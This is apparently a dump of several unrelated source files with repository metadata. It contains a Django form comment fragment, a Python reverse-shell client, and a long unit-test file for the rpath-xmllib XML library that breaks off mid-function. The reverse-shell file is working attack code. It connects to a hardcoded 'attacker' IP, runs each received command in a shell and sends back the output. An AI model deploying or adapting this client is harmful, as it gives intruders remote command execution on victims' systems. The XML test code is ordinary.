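#         abn = AUBusinessNumberField()
#         tfn = AUTaxFileNumberField(required=False)
#
#     form = BusinessForm({'postcode': '2000', 'abn': '51 824 753 556'})
#     form.is_valid()  # runs the validators declared above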
|
bsd-3-clause
| -3,051,444,075,775,757,000 | 30.204545 | 116 | 0.651129 | false |
SentinelWarren/Reverse-Shell
|
src/reverse_client_tcp_shell.py
|
1
|
1196
|
import socket # For starting TCP connection
import subprocess # To start the shell in the system
# Attacker IP goes here
ATT_IP = "10.254.141.59"
def connect():
# Creating object soketi
soketi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# attackers ( kali system ) IP address and port.
soketi.connect((ATT_IP, 8080))
while True: # Waiting for commands
# read the first 1024 KB of the tcp socket
komandi = soketi.recv(1024)
if 'terminate' in komandi: # Terminate - Break
soketi.close()
break
else: # else pass command to shell.
CMD = subprocess.Popen(komandi, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
soketi.send(CMD.stdout.read()) # send back the result
# send back the error -if any-, such as syntax error
soketi.send(CMD.stderr.read())
if __name__ == "__main__":
connect()
|
gpl-3.0
| -3,769,709,386,116,838,400 | 35.242424 | 126 | 0.51087 | false |
sassoftware/rpath-xmllib
|
xmllib_test/xmllibtest.py
|
1
|
37179
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import StringIO
import tempfile
from lxml import etree
import rpath_xmllib as xmllib
# This is an unused import, but it should make the test suite depend on api1
from rpath_xmllib import api1 as xmllib1 # pyflakes=ignore
from testrunner import testhelp
class BaseTest(testhelp.TestCase):
pass
class DataBindingNodeTest(BaseTest):
def testSerializableNodeInterface(self):
node = xmllib.SerializableObject()
self.failUnlessRaises(NotImplementedError, node._getName)
self.failUnlessRaises(NotImplementedError, node._getLocalNamespaces)
self.failUnlessRaises(NotImplementedError, node._iterAttributes)
self.failUnlessRaises(NotImplementedError, node._iterChildren)
self.failUnlessRaises(NotImplementedError, node.getElementTree)
def testGetApiVersion(self):
self.failUnlessEqual(xmllib.VERSION, '0.1')
def testIterAttributes(self):
refAttrs = {'xmlns' : 'a', 'xmlns:ns' : 'b',
'ns:attr1' : 'val1', 'attr2' : 'val2'}
node = xmllib.BaseNode(refAttrs)
attrs = dict(x for x in node.iterAttributes())
self.failUnlessEqual(attrs, refAttrs)
node.setName('ns:foo')
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<ns:foo xmlns="a" xmlns:ns="b" attr2="val2" ns:attr1="val1"/>')
def testGetChildren(self):
binder = xmllib.DataBinder()
rootNode = binder.parseFile(StringIO.StringIO("""
<nsB:root xmlns="def" xmlns:nsA="a" xmlns:nsB="b">
<nsA:child>childA</nsA:child>
<nsB:child>childB</nsB:child>
<child>childDef</child>
</nsB:root>
"""))
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child', 'nsA')], ['childA'])
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child', 'nsB')], ['childB'])
self.failUnlessEqual([ x.getText()
for x in rootNode.getChildren('child')], ['childDef'])
def testGetAttribute(self):
# We are redefining namespace nsC, which is not supported
refAttrs = {'xmlns' : 'a', 'xmlns:nsB' : 'b', 'xmlns:nsC' : 'b',
'attr' : 'val1', 'nsB:attr' : 'val2', 'nsC:attr' : 'val3'}
node = xmllib.BaseNode(refAttrs, name = 'root')
self.failUnlessEqual(node.getAttribute('attr'), 'val1')
self.failUnlessEqual(node.getAttribute('attr', 'nsB'), 'val2')
self.failUnlessEqual(node.getAttribute('attr', 'nsC'), 'val3')
self.failUnlessEqual(node.getAttribute('attr', 'EEE'), None)
self.failUnlessEqual(node.getAttributeByNamespace('attr'), 'val1')
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'a'), 'val1')
# This is the same attribute, we just happen to have two identical
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'b'), 'val2')
self.failUnlessEqual(node.getAttributeByNamespace('attr', 'E'), None)
        # Make sure we get the right namespaces (albeit duplicated)
self.failUnlessEqual(list(node.iterNamespaces()),
[(None, 'a'), ('nsB', 'b'), ('nsC', 'b')])
# lxml will notice the re-definition of a namespace
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<root xmlns="a" xmlns:nsB="b" xmlns:nsC="b" nsB:attr="val3" attr="val1"/>')
def testSlotBased(self):
class S(xmllib.SlotBasedSerializableObject):
tag = 'Blah'
__slots__ = ['attr1', 'child1', 'maybe']
binder = xmllib.DataBinder()
node = S()
node.attr1 = 1
node.child1 = xmllib.BooleanNode().characters('true')
node.maybe = xmllib.StringNode().characters('Maybe')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
'<Blah attr1="1"><bool>true</bool><string>Maybe</string></Blah>')
node.maybe = {}
self.failUnlessRaises(xmllib.XmlLibError, binder.toXml, node)
def testSlotBasedEq(self):
class WithSlots(xmllib.SlotBasedSerializableObject):
tag = "something"
__slots__ = ['foo']
node1 = WithSlots()
node2 = WithSlots()
node1.foo = 'foo'
node2.foo = 'foo'
self.assertEquals(node1, node2)
node1.foo = 'foo'
node2.foo = 'fo0'
self.assertEquals(node1 == node2, False)
self.assertEquals(node1 != node2, True)
def testUndefinedNamespace(self):
attrs = {'ns:attr1' : 'val1'}
self.failUnlessRaises(xmllib.UndefinedNamespaceError,
xmllib.BaseNode, attrs)
def testCreateElementTree(self):
attrs = {'{a}attr1' : 'val1', 'xmlns' : 'b'}
ns = {'ns' : 'a'}
n = xmllib.createElementTree('node', attrs, ns)
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b"/>')
attrs = {'{a}attr1' : 'va11', '{c}attr2' : 'val2'}
ns = {'nsc' : 'c'}
n2 = xmllib.createElementTree('{c}subnode', attrs, ns, parent = n)
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b">'
'<nsc:subnode xmlns:nsc="c" ns:attr1="va11" nsc:attr2="val2"/>'
'</node>')
n3 = xmllib.createElementTree('{a}subnode', {}, parent = n)
n3.text = 'node text'
self.assertXMLEquals(etree.tostring(n),
'<node xmlns:ns="a" ns:attr1="val1" xmlns="b">'
'<nsc:subnode xmlns:nsc="c" ns:attr1="va11" nsc:attr2="val2"/>'
'<ns:subnode>node text</ns:subnode>'
'</node>')
def testSplitNamespace(self):
self.failUnlessEqual(xmllib.splitNamespace('a'), (None, 'a'))
self.failUnlessEqual(xmllib.splitNamespace('b:a'), ('b', 'a'))
def testUnsplitNamespace(self):
self.failUnlessEqual(xmllib.unsplitNamespace('a'), 'a')
self.failUnlessEqual(xmllib.unsplitNamespace('a', None), 'a')
self.failUnlessEqual(xmllib.unsplitNamespace('a', 'b'), 'b:a')
def testGetAbsoluteName(self):
# No namespace specified
node = xmllib.BaseNode()
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), 'foo')
# With a default namespace
node = xmllib.BaseNode(dict(xmlns = "a"))
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), '{a}foo')
# With a namespace
node = xmllib.BaseNode({'xmlns' : 'b', 'xmlns:ns' : 'a'})
node.setName('ns:foo')
self.failUnlessEqual(node.getAbsoluteName(), '{a}foo')
node.setName('foo')
self.failUnlessEqual(node.getAbsoluteName(), '{b}foo')
# With a bad namespace
self.failUnlessRaises(xmllib.UndefinedNamespaceError,
node.setName, 'nosuchns:foo')
def testIntObj(self):
node = xmllib.IntegerNode()
node.characters('3')
self.assertEquals(node.finalize(), 3)
def testIntObjInfoLoss(self):
node = xmllib.IntegerNode()
self.failUnlessRaises(AttributeError, setattr, node, 'garbage', 'data')
node.__class__.test = 'foo'
res = node.finalize()
self.failIf(hasattr(res.__class__, 'test'))
self.assertEquals(res, 0)
def testStringObj(self):
node = xmllib.StringNode()
node.characters('foo')
self.assertEquals(node.finalize(), 'foo')
def testBooleanNode(self):
node = xmllib.BooleanNode()
node.characters('true')
self.assertEquals(node.finalize(), True)
node = xmllib.BooleanNode()
node.characters('False')
self.assertEquals(node.finalize(), False)
node = xmllib.BooleanNode()
node.characters('1')
self.assertEquals(node.finalize(), True)
node = xmllib.BooleanNode()
node.characters('0')
self.assertEquals(node.finalize(), False)
self.failUnlessEqual(node.fromString(True), True)
self.failUnlessEqual(node.fromString(False), False)
self.failUnlessEqual(node.fromString("tRuE"), True)
self.failUnlessEqual(node.fromString("1"), True)
self.failUnlessEqual(node.fromString("abcde"), False)
def testNullNode(self):
node = xmllib.NullNode()
node.characters('anything at all')
self.assertEquals(node.finalize(), None)
binder = xmllib.DataBinder()
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<none/>")
def testCompositeNode(self):
class CompNode(xmllib.BaseNode):
_singleChildren = ['integerData', 'stringData']
node = CompNode()
child = xmllib.IntegerNode(name = 'integerData')
child.characters('3')
node.addChild(child)
self.assertEquals(node.integerData, 3)
child = xmllib.StringNode(name = 'stringData')
child.setName('stringData')
child.characters('foo')
node.addChild(child)
self.assertEquals(node.stringData, 'foo')
child = xmllib.StringNode(name = 'unknownData')
child.characters('bar')
node.addChild(child)
self.failIf(hasattr(node, 'unknownData'))
self.failUnlessEqual([ x for x in node.iterChildren() ], ['bar'])
class ContentHandlerTest(BaseTest):
def testInvalidData(self):
data = "vadfadfadf"
binder = xmllib.DataBinder()
self.failUnlessRaises(xmllib.InvalidXML,
binder.parseString, data)
def testToplevelNode(self):
# Some invalid XML
data = "vadfadfadf"
tn = xmllib.ToplevelNode(data)
self.failUnlessEqual(tn.name, None)
# Invalid XML (but the sax parser should not notice the lack of a
# close tag)
data = '''<?xml version="1.0"?>
<node xmlns="a" xmlns:xsi="b" xsi:schemaLocation="c" xsi:q="q" attr="d">blah'''
tn = xmllib.ToplevelNode(data)
self.failUnlessEqual(tn.name, 'node')
# Valid XML
data2 = data + "<node>"
tn = xmllib.ToplevelNode(data2)
self.failUnlessEqual(tn.name, 'node')
self.failUnlessEqual(tn.attrs, {'xmlns' : 'a', 'xmlns:xsi' : 'b',
'xsi:schemaLocation' : 'c', 'attr' : 'd', 'xsi:q' : 'q'})
self.failUnlessEqual(tn.getAttributesByNamespace('b'),
{'schemaLocation' : 'c', 'q' : 'q'})
self.failUnlessEqual(tn.getAttributesByNamespace('a'),
{'attr' : 'd'})
self.failUnlessEqual(tn.getAttributesByNamespace('nosuchns'),
{})
def testHandlerRegisterType(self):
hdlr = xmllib.BindingHandler()
self.assertEquals(hdlr.typeDict, {})
hdlr.registerType(xmllib.StringNode, 'foo')
self.assertEquals(hdlr.typeDict, {(None, 'foo'): xmllib.StringNode})
hdlr = xmllib.BindingHandler()
hdlr.registerType(xmllib.StringNode, 'foo', namespace = 'ns0')
self.assertEquals(hdlr.typeDict, {('ns0', 'foo'): xmllib.StringNode})
hdlr = xmllib.BindingHandler({(None, 'bar'): xmllib.IntegerNode})
self.assertEquals(hdlr.typeDict, {(None, 'bar'): xmllib.IntegerNode})
def testStartElement(self):
hdlr = xmllib.BindingHandler({(None, 'foo'): xmllib.StringNode})
hdlr.startElement('foo', {})
self.assertEquals(len(hdlr.stack), 1)
self.assertEquals(hdlr.stack[0].__class__.__name__ , 'StringNode')
assert isinstance(hdlr.stack[0], xmllib.StringNode)
hdlr.startElement('bar', {'attr1': '1'})
self.assertEquals(len(hdlr.stack), 2)
self.assertEquals(hdlr.stack[1].__class__.__name__ , 'GenericNode')
assert isinstance(hdlr.stack[1], xmllib.GenericNode)
self.assertEquals(hdlr.stack[1].getAttribute('attr1'), '1')
def testEndElement1(self):
hdlr = xmllib.BindingHandler()
node1 = xmllib.BaseNode(name = 'foo')
node2 = xmllib.BaseNode(name = 'foo')
hdlr.stack = [node1, node2]
hdlr.endElement('foo')
self.assertEquals(hdlr.rootNode, None)
self.assertEquals(len(hdlr.stack), 1)
self.assertEquals(hdlr.stack[0], node1)
self.failIf(hdlr.stack[0] == node2)
hdlr.endElement('foo')
self.assertEquals(hdlr.rootNode, node1)
self.assertEquals(len(hdlr.stack), 0)
def testEndElement2(self):
class RecordNode(xmllib.BaseNode):
def __init__(x, name = None):
x.called = False
xmllib.BaseNode.__init__(x, name = name)
def addChild(x, child):
assert isinstance(child, xmllib.BaseNode)
x.called = True
return xmllib.BaseNode.addChild(x, child)
hdlr = xmllib.BindingHandler()
node1 = RecordNode(name = 'foo')
node2 = xmllib.BaseNode(name = 'foo')
hdlr.stack = [node1, node2]
hdlr.endElement('foo')
self.assertEquals(node1.called, True)
def testCharacters1(self):
hdlr = xmllib.BindingHandler()
node = xmllib.BaseNode()
hdlr.stack = [node]
hdlr.characters('foo')
self.assertEquals(node.getText(), 'foo')
def testCharacters2(self):
class RecordNode(xmllib.BaseNode):
def __init__(x):
x.called = False
xmllib.BaseNode.__init__(x)
def characters(x, ch):
x.called = True
hdlr = xmllib.BindingHandler()
node = RecordNode()
hdlr.stack = [node]
hdlr.characters('foo')
self.assertEquals(node.called, True)
def testStreaming(self):
vals = range(5)
class Root(xmllib.BaseNode):
pass
class Pkg(xmllib.BaseNode):
WillYield = True
_singleChildren = [ 'val' ]
class Val(xmllib.IntegerNode):
pass
xml = "<root>%s</root>" % ''.join(
"<pkg><val>%s</val></pkg>" % i for i in vals)
hdlr = xmllib.StreamingDataBinder()
hdlr.registerType(Root, name = "root")
hdlr.registerType(Pkg, name = "pkg")
hdlr.registerType(Val, name = "val")
it = hdlr.parseString(xml)
self.failUnlessEqual([ x.val for x in it ], vals)
sio = StringIO.StringIO(xml)
# Same deal with a tiny buffer size, to make sure we're incrementally
# parsing
it = hdlr.parseFile(sio)
it.BUFFER_SIZE = 2
self.failUnlessEqual(it.next().val, 0)
self.failUnlessEqual(sio.tell(), 30)
self.failUnlessEqual(it.next().val, 1)
self.failUnlessEqual(it.parser.getColumnNumber(), 52)
self.failUnlessEqual(it.next().val, 2)
self.failUnlessEqual(it.parser.getColumnNumber(), 75)
self.failUnlessEqual(it.next().val, 3)
self.failUnlessEqual(it.parser.getColumnNumber(), 98)
class BinderTest(BaseTest):
def testBinderRegisterType(self):
binder = xmllib.DataBinder()
binder.registerType(xmllib.StringNode, 'foo')
self.assertEquals(binder.contentHandler.typeDict,
{(None, 'foo'): xmllib.StringNode})
binder = xmllib.DataBinder({(None, 'bar'): xmllib.IntegerNode})
self.assertEquals(binder.contentHandler.typeDict,
{(None, 'bar'): xmllib.IntegerNode})
def testParseString(self):
class ComplexType(xmllib.BaseNode):
def addChild(slf, childNode):
if childNode.getName() == 'foo':
slf.foo = childNode.finalize()
elif childNode.getName() == 'bar':
slf.bar = childNode.finalize()
binder = xmllib.DataBinder()
binder.registerType(xmllib.IntegerNode, 'foo')
binder.registerType(xmllib.StringNode, 'bar')
binder.registerType(ComplexType, 'baz')
data = '<baz><foo>3</foo><bar>test</bar></baz>'
obj = binder.parseString(data)
self.assertEquals(obj.foo, 3)
self.assertEquals(obj.bar, 'test')
self.assertEquals(obj.getName(), 'baz')
def testRoundTripGenericParsing(self):
binder = xmllib.DataBinder()
data = '<baz><foo>3</foo><bar>test</bar></baz>'
obj = binder.parseString(data)
data2 = binder.toXml(obj, prettyPrint = False)
self.assertXMLEquals(data, data2)
def testParseFile(self):
class ComplexType(xmllib.BaseNode):
_singleChildren = ['foo', 'bar']
binder = xmllib.DataBinder()
binder.registerType(xmllib.BooleanNode, 'foo')
binder.registerType(xmllib.NullNode, 'bar')
binder.registerType(ComplexType, 'baz')
data = '<baz><foo>TRUE</foo><bar>test</bar></baz>'
fd, tmpFile = tempfile.mkstemp()
try:
os.close(fd)
f = open(tmpFile, 'w')
f.write(data)
f.close()
obj = binder.parseFile(tmpFile)
finally:
os.unlink(tmpFile)
self.assertEquals(obj.foo, True)
self.assertEquals(obj.bar, None)
self.assertEquals(obj.getName(), 'baz')
def testIterChildren(self):
binder = xmllib.DataBinder()
class Foo(xmllib.BaseNode):
def iterChildren(self):
if hasattr(self, 'bar'):
yield self.bar
if hasattr(self, 'foo'):
yield xmllib.StringNode(name = 'foo').characters(
xmllib.BooleanNode.toString(self.foo))
if hasattr(self, 'test'):
yield xmllib.StringNode(name = 'test').characters(self.test)
foo = Foo(name = 'Foo')
foo.foo = True
foo.bar = Foo(name = 'bar')
foo.bar.test = '123'
data = binder.toXml(foo)
self.assertXMLEquals(data, "<?xml version='1.0' encoding='UTF-8'?>"
'\n<Foo>\n <bar>\n'
' <test>123</test>\n </bar>\n <foo>true</foo>\n</Foo>')
obj = binder.parseString(data)
data2 = binder.toXml(obj)
self.assertXMLEquals(data, data2)
def testIterChildren2(self):
binder = xmllib.DataBinder()
binder.registerType(xmllib.BooleanNode, 'foo')
class Foo(xmllib.BaseNode):
def iterChildren(self):
if hasattr(self, 'bar'):
yield self.bar
if hasattr(self, 'foo'):
yield xmllib.StringNode(name = 'foo').characters(
xmllib.BooleanNode.toString(self.foo))
if hasattr(self, 'test'):
yield xmllib.StringNode(name = 'test').characters(self.test)
foo = Foo(name = 'Foo')
foo.foo = True
foo.bar = Foo(name = 'bar')
foo.bar.test = '123'
data = binder.toXml(foo)
self.assertXMLEquals(data,
'\n'.join((
'<?xml version="1.0" encoding="UTF-8"?>',
'<Foo>',
' <bar>',
' <test>123</test>',
' </bar>',
' <foo>true</foo>',
'</Foo>')))
def testToXmlInt(self):
binder = xmllib.DataBinder()
intObj = xmllib.IntegerNode(name = 'foo').characters('3')
self.assertXMLEquals(binder.toXml(intObj, prettyPrint = False),
'<foo>3</foo>')
intObj = xmllib.IntegerNode().characters('3')
self.assertXMLEquals(binder.toXml(intObj, prettyPrint = False),
'<int>3</int>')
def testToXmlBool(self):
binder = xmllib.DataBinder()
node = xmllib.BooleanNode(name = 'foo').characters('1')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>true</foo>")
node = xmllib.BooleanNode(name = 'foo').characters('tRue')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>true</foo>")
node = xmllib.BooleanNode(name = 'foo').characters('False')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>false</foo>")
node = xmllib.BooleanNode().characters('tRue')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<bool>true</bool>")
def testToXmlList2(self):
binder = xmllib.DataBinder()
class ListObj(xmllib.SerializableList):
tag = "toplevel"
class Node1(xmllib.SlotBasedSerializableObject):
__slots__ = [ 'attr1', 'attr2', 'attr3', 'children' ]
tag = "node1"
l1 = ListObj()
n1 = Node1()
l1.append(n1)
n1.attr1 = "attrVal11"
n1.attr2 = 12
n1.attr3 = None
n1.children = xmllib.StringNode(name = "child11").characters("text 11")
n2 = Node1()
l1.append(n2)
n2.attr1 = 21
n2.attr2 = "attrVal21"
n2.attr3 = True
# Add a list of elements as children of n2
l2 = ListObj()
l2.tag = "list2"
l2.append(xmllib.StringNode(name = "child21").characters("text 21"))
l2.append(xmllib.StringNode(name = "child31").characters("text 31"))
n2.children = l2
xmlData = binder.toXml(l1)
self.assertXMLEquals(xmlData, """
<?xml version='1.0' encoding='UTF-8'?>
<toplevel>
<node1 attr2="12" attr1="attrVal11">
<child11>text 11</child11>
</node1>
<node1 attr2="attrVal21" attr3="true" attr1="21">
<list2>
<child21>text 21</child21>
<child31>text 31</child31>
</list2>
</node1>
</toplevel>
""")
def testToXmlUnicode(self):
class Foo(xmllib.BaseNode):
pass
binder = xmllib.DataBinder()
binder.registerType('foo', Foo)
foo = Foo({u'birth-place' : u'K\u00f6ln'}, name = 'Foo')
marriage = xmllib.BaseNode(name = 'marriage')
marriage.characters(u'Troms\xf8')
foo.addChild(marriage)
self.assertXMLEquals(binder.toXml(foo, prettyPrint = False),
'<Foo birth-place="%s"><marriage>%s</marriage></Foo>' %
('Köln', 'Troms\xc3\xb8'))
targetData = '<?xml version="1.0" encoding="UTF-8"?>\n' \
'<Foo birth-place="Köln">\n <marriage>Troms\xc3\xb8</marriage>\n</Foo>'
self.assertXMLEquals(binder.toXml(foo), targetData)
# Make sure we can still load the string
obj = binder.parseString(binder.toXml(foo))
def testUnkNodeVsStringNode(self):
data = "<build><foo>123</foo></build>"
binder = xmllib.DataBinder()
obj = binder.parseString(data)
assert isinstance(obj.getChildren('foo')[0], xmllib.BaseNode)
self.assertEquals(obj.getChildren('foo')[0].getText(), '123')
binder.registerType(xmllib.StringNode, 'foo')
obj = binder.parseString(data)
self.assertEquals([ x for x in obj.iterChildren() ],
['123'])
def testAttributesVsTags(self):
class Foo(object):
test = 42
def getElementTree(slf, parent = None):
elem = etree.Element('Foo', dict(test=str(slf.test)))
if parent is not None:
parent.append(elem)
return elem
binder = xmllib.DataBinder()
foo = Foo()
data = binder.toXml(foo, prettyPrint = False)
self.assertXMLEquals(data, '<Foo test="42"/>')
foo.test = 14
data2 = binder.toXml(foo, prettyPrint = False)
self.assertXMLEquals(data2, '<Foo test="14"/>')
class FooNode(xmllib.BaseNode):
def addChild(slf, child):
if child.getName() == 'test':
slf.test = child.finalize()
def finalize(slf):
t = slf.getAttribute('test')
if t is not None:
slf.test = int(t)
return slf
binder = xmllib.DataBinder()
binder.registerType(xmllib.IntegerNode, 'test')
binder.registerType(FooNode, 'Foo')
obj = binder.parseString(data2)
# test that conflicting attributes and tags were preserved
self.assertEquals(obj.test, 14)
def testChildOrder(self):
binder = xmllib.DataBinder()
ordering = ['foo']
items = [ xmllib.BaseNode(name = x) for x in ['foo', 'bar']]
# prove that items in the ordering are listed first
self.assertEquals(xmllib.orderItems(items, ordering), items)
self.assertEquals(xmllib.orderItems(reversed(items), ordering), items)
ordering = ['foo', 'bar']
items = [ xmllib.BaseNode(name = x)
for x in ['biff', 'baz', 'bar', 'foo'] ]
ref = [items[3], items[2], items[1], items[0]]
        # prove ordering of listed items follows the list; ordering of other
        # items is lexicographical
self.assertEquals(xmllib.orderItems(items, ordering), ref)
# prove that it's ok to have items missing from ordering
ordering = ['foo', 'bar', 'unused']
items.append(xmllib.BaseNode(name = 'another'))
ref.insert(2, items[-1])
self.assertEquals(xmllib.orderItems(items, ordering), ref)
class RoundTripTest(BaseTest):
def testXml2Obj2Xml(self):
origData = "<?xml version='1.0' encoding='UTF-8'?>\n<build>\n <foo>123</foo>\n <foo>\xc3\xb6</foo>\n</build>"
binder = xmllib.DataBinder()
binder.registerType('foo', xmllib.StringNode)
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testXmlAttrs(self):
origData = """<?xml version='1.0' encoding='UTF-8'?>\n<build data="1">\n <foo>123</foo>\n</build>"""
binder = xmllib.DataBinder()
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testXmlAttrs2(self):
origData = """<?xml version='1.0' encoding='UTF-8'?>\n<build data="1">\n <foo>123</foo>\n</build>"""
refData = '<build data="1"><foo>123</foo></build>'
binder = xmllib.DataBinder()
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testRoundTripDefault(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<foo>',
' <baz>More text</baz>',
' <bar>This is some text</bar>',
'</foo>'))
data2 = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<foo>',
' <bar>This is some text</bar>',
' <baz>More text</baz>',
'</foo>'))
obj = binder.parseString(data)
newData = binder.toXml(obj)
# this child node ordering is influenced by the order of the nodes
# in the original xml blob
self.assertXMLEquals(newData, data)
class Foo(xmllib.BaseNode):
name = 'foo'
_childOrder = ['baz', 'bar']
binder = xmllib.DataBinder()
binder.registerType(Foo)
obj = binder.parseString(data2)
newData = binder.toXml(obj)
self.assertXMLEquals(newData, data)
def testNamespaceSupport(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<gah:root-node xmlns="http://example.com"'
' xmlns:gah="http://exmaple.com/gah">',
' <gah:baz>More text</gah:baz>',
'</gah:root-node>'))
obj = binder.parseString(data)
ndata = binder.toXml(obj)
self.assertXMLEquals(data, ndata)
def testXmlBaseNamespaceSupport(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<gah:root-node xmlns="http://example.com"'
' xmlns:gah="http://exmaple.com/gah" xml:base="media://foo">',
' <gah:baz>More text</gah:baz>',
'</gah:root-node>'))
obj = binder.parseString(data)
ndata = binder.toXml(obj)
self.assertXMLEquals(data, ndata)
self.failUnlessEqual(obj.getAttributeByNamespace('base', namespace='http://www.w3.org/XML/1998/namespace'),
'media://foo')
def testDispatcherRegisterClasses(self):
class Coll1:
class BaseType(object):
@classmethod
def getTag(kls):
return kls.tag
def __init__(self, node):
self.node = node
class ClassA(BaseType):
tag = 'A'
class ClassB(BaseType):
tag = 'B'
disp = xmllib.NodeDispatcher()
        disp.registerClasses(Coll1, Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{}A' : Coll1.ClassA, '{}B' : Coll1.ClassB})
# With a default namespace
disp = xmllib.NodeDispatcher({None : 'nspaceA'})
        disp.registerClasses(Coll1, Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceA}B' : Coll1.ClassB})
# One of the classes is in a different namespace
Coll1.ClassB.tag = 'nsB:B'
nsMap = {None : 'nspaceA', 'nsB' : 'nspaceB'}
disp = xmllib.NodeDispatcher(nsMap = nsMap)
        disp.registerClasses(Coll1, Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceB}B' : Coll1.ClassB})
# Test that dispatching works
n1 = xmllib.BaseNode(nsMap = nsMap, name = 'A')
c1 = disp.dispatch(n1)
self.failUnlessEqual(c1.__class__, Coll1.ClassA)
n2 = xmllib.BaseNode(nsMap = nsMap, name = 'nsB:B')
c2 = disp.dispatch(n2)
self.failUnlessEqual(c2.__class__, Coll1.ClassB)
# Now, an example of a class that we register directly
class ClassC(object):
def __init__(self, node):
self.node = node
disp.registerType(ClassC, name = 'C')
n3 = xmllib.BaseNode(nsMap = nsMap, name = 'C')
c3 = disp.dispatch(n3)
self.failUnlessEqual(c3.__class__, ClassC)
# And another one, now with namespace
disp.registerType(ClassC, name = 'D', namespace = 'nsB')
n4 = xmllib.BaseNode(nsMap = nsMap, name = 'nsB:D')
c4 = disp.dispatch(n4)
self.failUnlessEqual(c4.__class__, ClassC)
self.failUnlessEqual(c4.node, n4)
# a class we register without a name and with no getTag - should be
# ignored
class ClassE(object):
def __init__(self, node):
self.node = node
disp.registerType(ClassE)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceB}B' : Coll1.ClassB,
'{nspaceA}C' : ClassC, '{nspaceB}D' : ClassC})
# And a node we don't handle
n5 = xmllib.BaseNode(nsMap = nsMap, name = 'X')
c5 = disp.dispatch(n5)
self.failUnlessEqual(c5, None)
class SchemaValidationTest(BaseTest):
def testGetSchemaLocationFromStream(self):
# Exceptions first
stream = StringIO.StringIO('No XML data')
e = self.failUnlessRaises(xmllib.InvalidXML,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Possibly malformed XML")
stream = StringIO.StringIO('<node xmlns:xsi="what?" '
'xsi:schemaLocation="blah1 blah2"/>')
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Schema location not specified in XML stream")
stream = StringIO.StringIO('<node '
'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>')
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Schema location not specified in XML stream")
stream = StringIO.StringIO('BAD DATA <node '
'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
'xsi:schemaLocation = "blah1 blah2"/>')
stream.seek(9)
self.failUnlessEqual(xmllib.DataBinder.getSchemaLocationsFromStream(stream),
["blah1", "blah2"])
self.failUnlessEqual(stream.tell(), 9)
def testChooseSchemaFile(self):
schemaFiles = ["sf1", "sf2", "sf4", "sf5"]
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, None)
self.failUnlessEqual(str(e), "Schema directory not specified")
tmpdir = tempfile.mkdtemp()
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, tmpdir)
self.failUnlessEqual(str(e),
"No applicable schema found in directory `%s'" % tmpdir)
# To make sure directory ordering doesn't matter, mock out listdir
origListdir = os.listdir
listdir = lambda x: ["sf4", "sf3", "sf2"]
try:
os.listdir = listdir
file(os.path.join(tmpdir, "sf2"), "w")
file(os.path.join(tmpdir, "sf3"), "w")
file(os.path.join(tmpdir, "sf4"), "w")
ret = xmllib.DataBinder.chooseSchemaFile(schemaFiles, tmpdir)
self.failUnlessEqual(ret, os.path.join(tmpdir, "sf2"))
finally:
os.listdir = origListdir
shutil.rmtree(tmpdir, ignore_errors = True)
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, tmpdir)
self.failUnlessEqual(str(e), "Schema directory `%s' not found" %
tmpdir)
def testClassLevelValidate(self):
tmpdir = tempfile.mkdtemp()
